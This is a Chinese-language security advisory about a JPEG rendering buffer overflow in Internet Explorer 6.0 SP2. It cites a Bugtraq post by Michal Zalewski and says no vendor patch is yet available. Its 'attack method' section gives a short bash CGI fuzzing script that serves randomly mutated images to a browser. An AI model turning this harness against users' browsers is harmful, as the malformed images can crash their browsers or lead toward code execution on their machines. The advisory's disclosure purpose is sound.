|
|
涉及程序: |
Microsoft Internet Explorer程序 |
|
描述: |
Microsoft Internet Explorer JPEG图形渲染未明溢出漏洞 |
|
详细: |
Microsoft Internet Explorer是非常流行的WEB浏览器。
Microsoft Internet Explorer浏览器所使用的JPEG图形渲染库中存在缓冲区溢出漏洞,成功的攻击可以导致执行任意代码。
起因是拷贝操作之前没有执行正确的边界检查。攻击者可以通过创建随机的浏览器输入来利用这个漏洞。
<*来源:Michal Zalewski (lcamtuf@echelon.pl)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112144761123607&w=2 *>
受影响系统: Microsoft Internet Explorer 6.0 SP2
|
|
攻击方法: |
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/bin/bash
echo "Content-Type: text/html" echo
ID="timg-$$-$RANDOM-$RANDOM"
rm -f timg-* AFX.log
cat <<_EOF_ <HTML> <HEAD> <META HTTP-EQUIV="Refresh" content="0;URL=/"> </HEAD> <BODY> _EOF_
CNT=0
for i in img/*; do CNT="$[CNT+1]" FNAM="$ID-$CNT" EXT=`echo $i | cut -d. -f2` ./afx-loc -p 1 -i 100 -m RANDOM -s 60000 <$i 2>$FNAM.$EXT >>AFX.log echo "Test $CNT - <IMG SRC=\"$FNAM.$EXT\"><BR>" done
|
|
解决方案: |
厂商补丁:
Microsoft --------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp
|